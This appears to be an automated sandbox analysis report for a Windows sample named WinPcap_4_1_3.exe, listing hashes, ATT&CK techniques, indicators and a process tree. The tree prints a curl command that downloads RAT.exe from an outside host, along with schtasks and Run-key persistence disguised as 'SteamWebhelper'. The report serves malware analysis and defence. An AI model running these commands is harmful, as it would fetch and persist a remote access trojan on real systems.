fc4623b113a1f603c0d9ad5f83130bd6de1c62b973be9892305132389c8588de

Analysis

max time kernel
534s
max time network
538s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
05-04-2024 18:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WinPcap_4_1_3.exe
Size

893KB
MD5

a11a2f0cfe6d0b4c50945989db6360cd
SHA1

e2516fcd1573e70334c8f50bee5241cdfdf48a00
SHA256

fc4623b113a1f603c0d9ad5f83130bd6de1c62b973be9892305132389c8588de
SHA512

2652d84eb91ca7957b4fb3ff77313e5dae978960492669242df4f246296f1bedaa48c0d33ffb286b2859a1b86ef5460060b551edca597b4ec60ee08676877c70
SSDEEP

24576:UBOldyR6ORWsaM2QROxa6jsqUENfJjNK/CG6niqiL:2KzqWsayROxa6QDENuaG+ifL

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\e\RAT.exe	net_reactor
behavioral1/memory/2576-222-0x0000000000950000-0x0000000000996000-memory.dmp	net_reactor

Drops startup file 2 IoCs

Processes:

RAT.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SteamWebhelper.lnk	RAT.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SteamWebhelper.lnk	RAT.exe

Executes dropped EXE 6 IoCs

Processes:

RAT.exeSteamWebhelperSteamWebhelperRAT.exeRAT.exeSteamWebhelper

pid process

2576 RAT.exe
4896 SteamWebhelper
1108 SteamWebhelper
592 RAT.exe
4964 RAT.exe
3600 SteamWebhelper
Loads dropped DLL 3 IoCs

Processes:

WinPcap_4_1_3.exe

pid process

5012 WinPcap_4_1_3.exe
5012 WinPcap_4_1_3.exe
5012 WinPcap_4_1_3.exe

pid	process
2576	RAT.exe
4896	SteamWebhelper
1108	SteamWebhelper
592	RAT.exe
4964	RAT.exe
3600	SteamWebhelper

pid	process
5012	WinPcap_4_1_3.exe
5012	WinPcap_4_1_3.exe
5012	WinPcap_4_1_3.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

RAT.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000\Software\Microsoft\Windows\CurrentVersion\Run\SteamWebhelper = "C:\\Users\\Admin\\AppData\\Roaming\\SteamWebhelper"	RAT.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

mstsc.exe

description	ioc	process
File opened (read-only)	\??\A:	mstsc.exe
File opened (read-only)	\??\E:	mstsc.exe
File opened (read-only)	\??\J:	mstsc.exe
File opened (read-only)	\??\L:	mstsc.exe
File opened (read-only)	\??\O:	mstsc.exe
File opened (read-only)	\??\Q:	mstsc.exe
File opened (read-only)	\??\V:	mstsc.exe
File opened (read-only)	\??\X:	mstsc.exe
File opened (read-only)	\??\G:	mstsc.exe
File opened (read-only)	\??\N:	mstsc.exe
File opened (read-only)	\??\W:	mstsc.exe
File opened (read-only)	\??\Y:	mstsc.exe
File opened (read-only)	\??\Z:	mstsc.exe
File opened (read-only)	\??\P:	mstsc.exe
File opened (read-only)	\??\U:	mstsc.exe
File opened (read-only)	\??\B:	mstsc.exe
File opened (read-only)	\??\H:	mstsc.exe
File opened (read-only)	\??\I:	mstsc.exe
File opened (read-only)	\??\K:	mstsc.exe
File opened (read-only)	\??\M:	mstsc.exe
File opened (read-only)	\??\R:	mstsc.exe
File opened (read-only)	\??\S:	mstsc.exe
File opened (read-only)	\??\T:	mstsc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

mstsc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000\Device Parameters	mstsc.exe
Key security queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Device Parameters	mstsc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Device Parameters\TSRedirFlags	mstsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\Device Parameters	mstsc.exe
Key security queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	mstsc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\TSRedirFlags	mstsc.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2208 schtasks.exe

pid	process
2208	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

Processes:

MiniSearchHost.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

mstsc.exe

pid process

1832 mstsc.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4280069375-290121026-380765049-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe

pid	process
1832	mstsc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

msedge.exemsedge.exeRAT.exe

pid	process
1512	msedge.exe
1512	msedge.exe
4924	msedge.exe
4924	msedge.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe
2576	RAT.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

Processes:

msedge.exe

pid process

4924 msedge.exe
4924 msedge.exe
4924 msedge.exe
4924 msedge.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

RAT.exeSteamWebhelperSteamWebhelperAUDIODG.EXERAT.exeRAT.exeSteamWebhelper

description	pid	process
Token: SeDebugPrivilege	2576	RAT.exe
Token: SeDebugPrivilege	2576	RAT.exe
Token: SeDebugPrivilege	4896	SteamWebhelper
Token: SeDebugPrivilege	1108	SteamWebhelper
Token: 33	4088	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4088	AUDIODG.EXE
Token: SeDebugPrivilege	592	RAT.exe
Token: SeDebugPrivilege	4964	RAT.exe
Token: SeDebugPrivilege	3600	SteamWebhelper

Suspicious use of FindShellTrayWindow 28 IoCs

Processes:

msedge.exemstsc.exe

pid	process
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
1832	mstsc.exe
1832	mstsc.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe
4924	msedge.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

MiniSearchHost.exeRAT.exemstsc.exe

pid process

2104 MiniSearchHost.exe
2576 RAT.exe
1832 mstsc.exe

pid	process
2104	MiniSearchHost.exe
2576	RAT.exe
1832	mstsc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 4924 wrote to memory of 5048	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 5048	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 4692	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 1512	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 1512	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe
PID 4924 wrote to memory of 580	4924	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\WinPcap_4_1_3.exe
"C:\Users\Admin\AppData\Local\Temp\WinPcap_4_1_3.exe"
1⤵
- Loads dropped DLL
PID:5012

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd5aca3cb8,0x7ffd5aca3cc8,0x7ffd5aca3cd8
2⤵
PID:5048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1928 /prefetch:2
2⤵
PID:4692

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2536 /prefetch:8
2⤵
PID:580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
2⤵
PID:1268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
2⤵
PID:1208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1
2⤵
PID:112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,14178761902344174401,17132806470310155267,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
2⤵
PID:1632

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1760

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:4312

C:\Windows\system32\curl.exe
curl http://risk.g-s.nu:2051/RAT.exe -o RAT.exe
2⤵
PID:1276

C:\Windows\system32\mstsc.exe
mstsc
2⤵
- Enumerates connected drives
- Checks SCSI registry key(s)
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1832

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5016

C:\Users\Admin\Downloads\e\RAT.exe
"C:\Users\Admin\Downloads\e\RAT.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2576

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SteamWebhelper" /tr "C:\Users\Admin\AppData\Roaming\SteamWebhelper"
2⤵
- Creates scheduled task(s)
PID:2208

C:\Users\Admin\AppData\Roaming\SteamWebhelper
C:\Users\Admin\AppData\Roaming\SteamWebhelper
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4896

C:\Users\Admin\AppData\Roaming\SteamWebhelper
C:\Users\Admin\AppData\Roaming\SteamWebhelper
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1108

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004EC 0x00000000000004E8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4088

C:\Users\Admin\Downloads\e\RAT.exe
"C:\Users\Admin\Downloads\e\RAT.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:592

C:\Users\Admin\Downloads\e\RAT.exe
"C:\Users\Admin\Downloads\e\RAT.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4964

C:\Users\Admin\AppData\Roaming\SteamWebhelper
C:\Users\Admin\AppData\Roaming\SteamWebhelper
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SteamWebhelper.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ded21ddc295846e2b00e1fd766c807db

SHA1
497eb7c9c09cb2a247b4a3663ce808869872b410

SHA256
26025f86effef56caa2ee50a64e219c762944b1e50e465be3a6b454bc0ed7305

SHA512
ddfaa73032590de904bba398331fdbf188741d96a17116ada50298b42d6eb7b20d6e50b0cfae8b17e2f145997b8ebce6c8196e6f46fbe11f133d3d82ce3656db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a0407c5de270b9ae0ceee6cb9b61bbf1

SHA1
fb2bb8184c1b8e680bf873e5537e1260f057751e

SHA256
a56989933628f6a677ad09f634fc9b7dd9cf7d06c72a76ddbb8221bc4a62ffcd

SHA512
65162bf07705dfdd348d4eaf0a3feba08dc2c0942a3a052b4492d0675ab803b104c03c945f5608fac9544681e0fe8b81d1aaca859663e79aa87fcb591ddb8136

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
180B

MD5
00a455d9d155394bfb4b52258c97c5e5

SHA1
2761d0c955353e1982a588a3df78f2744cfaa9df

SHA256
45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed

SHA512
9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
a62d9fda9bb733f941cfbbab3477cd10

SHA1
36e402cf32c4bc35a95373dca1c407f5671b490f

SHA256
cf5231ce3a4f3f193db5c652d610cb33972215a025dcf41d54b3a66a4fa3cfc5

SHA512
063258743dc180050f01d76f4c7850a3794ec0ca8617927d75138a41c1f629f08d0693ecd9db8149157dd35c67c8cb199931221cc60658b1166643645e15829d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
ca527ceae117c6da77f57c089ad9f2e8

SHA1
cad0986fd7b095a48c0edbf109c8e5cbf6e22160

SHA256
af3d861fb570b8e42606ffcb8699eadee72798ecbc501d8351f822c5115f5c88

SHA512
001359007d4130035a6d1e0444a5902cbca48dc4ca3a93e128ca52209ca5051c0fc885a07c5a04c05b8de0d8f3282cfe7d65296e236382dacee5901b6d072b92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
7a538da27b944995ac6ab4c6a0de1302

SHA1
9160d5b28ab926f9667190f7187a100b08c3ea36

SHA256
e149c5b41b784c92ae16f92a7267713a4348a80b12d6d1f8b96073bf84df9836

SHA512
f2a08c6408a069ce78840ae51986356b391777c630d4ed1647654c81496e49d984a8bb32f0577b32fe67ca3fa2b0539a4965d494b7b4ab180fbe4a9337b46d50

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
11KB

MD5
f2de638a4259125fdc63c3e174803714

SHA1
c2dc76d32dbc368e8b576a5dd9e0a2a7a5d6fa66

SHA256
c76921cb128864fa1ede8f5f96285a688474149a4d0ef6f15ae131250649a297

SHA512
625a76f433d1b50172950eea73425706e5be7547d589f0b660d7ffab6440f9f1542acc1944d20d64ba493c15c420593b12b53e6ad8fe181c0134001581aa7b19

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
11KB

MD5
31490a459c198da08ac2babda98140fe

SHA1
7d0ce403bc81bf92be58d7ad48763948920e8737

SHA256
f1cbb3423476a4c6fac691d9dd20e577518781c4ca79874e74d52f2961a62276

SHA512
1ff445b321634318fdca6fd7f946088a8309d283824205b5d1f9ac4d544d492bd608aa324e292ce99d332c747be3f49a59090b91e46e296335822d5d400fc715

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsh664C.tmp\InstallOptions.dll

Filesize
14KB

MD5
325b008aec81e5aaa57096f05d4212b5

SHA1
27a2d89747a20305b6518438eff5b9f57f7df5c3

SHA256
c9cd5c9609e70005926ae5171726a4142ffbcccc771d307efcd195dafc1e6b4b

SHA512
18362b3aee529a27e85cc087627ecf6e2d21196d725f499c4a185cb3a380999f43ff1833a8ebec3f5ba1d3a113ef83185770e663854121f2d8b885790115afdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsh664C.tmp\UserInfo.dll

Filesize
4KB

MD5
7579ade7ae1747a31960a228ce02e666

SHA1
8ec8571a296737e819dcf86353a43fcf8ec63351

SHA256
564c80dec62d76c53497c40094db360ff8a36e0dc1bda8383d0f9583138997f5

SHA512
a88bc56e938374c333b0e33cb72951635b5d5a98b9cb2d6785073cbcad23bf4c0f9f69d3b7e87b46c76eb03ced9bb786844ce87656a9e3df4ca24acf43d7a05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsh664C.tmp\ioSpecial.ini

Filesize
578B

MD5
4952b850293fb96582800eec5a78f693

SHA1
0212a27615e97ef4b50ec32664d0539ad710ea7a

SHA256
eef3794ba8f5476293c5e04f9daf48bfc9f3e5169108f1b66ae225ebb5f43730

SHA512
272f63954ce64624b4b6a1ecf433ec245ddb1ac7a76ba9a51a9e86b0404d037f28a9ae357ca0f236783f2c1861a1655dc3d1772838ac1b4112dd545c71218f9c

Download Submit
C:\Users\Admin\Downloads\e\RAT.exe

Filesize
255KB

MD5
46f50a1d5f46385a99e484eaea4ab436

SHA1
366f70e2b551fbeb9f6c2e98029a59549b28ea8f

SHA256
ae0c2a94d8cafeebea42458cab07bc8a372776e3125ad2c02489e60deeef3507

SHA512
96c6c5c6fbbf3389fccca1e7079ae2d66916a1008534bc82b84669c1ec4cf1fdd27deeec774ade2cf441e18765a6f473aee7a0e55ff2dafd190e85ce172d6837

Download Submit
\??\pipe\LOCAL\crashpad_4924_HJZSEMQLHXXMPOME

MD5
